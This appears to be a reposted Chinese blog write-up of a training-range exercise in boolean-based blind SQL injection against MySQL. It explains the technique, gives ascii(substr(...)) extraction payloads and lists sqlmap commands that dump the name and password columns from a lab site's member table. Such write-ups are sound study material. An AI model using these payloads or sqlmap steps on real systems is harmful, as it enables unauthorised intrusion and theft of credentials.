靶場練習-墨者學院-sql注入漏洞測試(布爾盲注）

本文轉載自查看原文 2019-12-12 16:35 246 web靶場練習/ web安全靶場練習

背景知識

string substring(string, start, length)

string substr(string, start, length)

第一個參數為要處理的字符串，start為開始位置，length為截取的長度。

ascii('A')=65

sqlmap -u 注入點url --current-db

sqlmap -u 注入點url -D 獲取到的數據名 --tables

sqlmap -u 注入點url -D 獲取到的數據庫名 -T 獲取到的表名 --columns

sqlmap -u 注入點url -D 獲取到的數據庫名 -T 獲取到的表名 -C 要獲取值指定列 --dump

mysql中有一個information_schema數據庫，用於維護mysql中的其他數據庫信息。

其中的tables表的TABLE_SCHEMA字段為庫名，TABLE_NAME字段為表名；

columns表的TABLE_SCHEMA字段為所屬的數據庫，TABLE_NAME字段為表名，COLUMN_NAME字段為列名。

是否存在過濾，是否可繞過。

是否可通過頁面變化或者時間變化，判斷是否存在注入點。

判斷注入類型，字符型還是數字型，字符型需要構造閉合。

通過order by 判斷列數。

若可回顯

　　在找到注入點，判斷出union 可用的字段后，判斷出所用的數據庫名字和用戶名字，然后再information_schema中查看對應的數據庫(table_schema)有哪幾個表(table_name)，然后在columns查看對應的表有哪些字段。

若不可回顯

通過構造正確的表達式，根據頁面是否正常顯示來判斷數據庫名、表名、字段名、字段值

1.判斷是否存在注入

2.判斷列數、位置、數據庫名。無回顯。

3.根據執行語句的正確與否決定頁面是否發生變化，判斷相應的數據庫名、表名、字段名、值。

ascii(substr((select database()),1,1))判斷出數據庫的名字
ascii(substr((select table_name from information_schema.tables where table_schema='獲取到的數據庫名字' limit 1,1),1,1)) 判斷出表名
ascii(substr((select column_name from information_schema.columns where table_name='獲取到的表名' and table_schema='獲取到的數據庫名' limit 0,1),1,1)) 判斷出列名
and ascii(substr((select concat(name) from stormgroup.member limit 1,1),1,1))

1.python2 sqlmap.py "http://219.153.49.228:48658/new_list.php?id=1" --current-db

2.python2 sqlmap.py "http://219.153.49.228:48658/new_list.php?id=1" -D stormgroup --tables

3.python2 sqlmap.py "http://219.153.49.228:48658/new_list.php?id=1" -D stormgroup -T member --columns

4.python2 sqlmap.py "http://219.153.49.228:48658/new_list.php?id=1" -D stormgroup -T member -C name,password --dump

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 墨者學院 SQL手工注入漏洞測試(MySQL數據庫-字符型）墨者學院靶場實戰 DVWA之SQL 注入(盲注)全級別原理篇—sql注入4：盲注 SQL注入之盲注簡單總結 DVWA-sql注入（盲注） Sqli-LABS通關筆錄-5[SQL布爾型盲注] SQL注入--顯注和盲注中過濾逗號繞過 Oracle基於布爾的盲注總結【SQL注入】類型注入、盲注、時間注入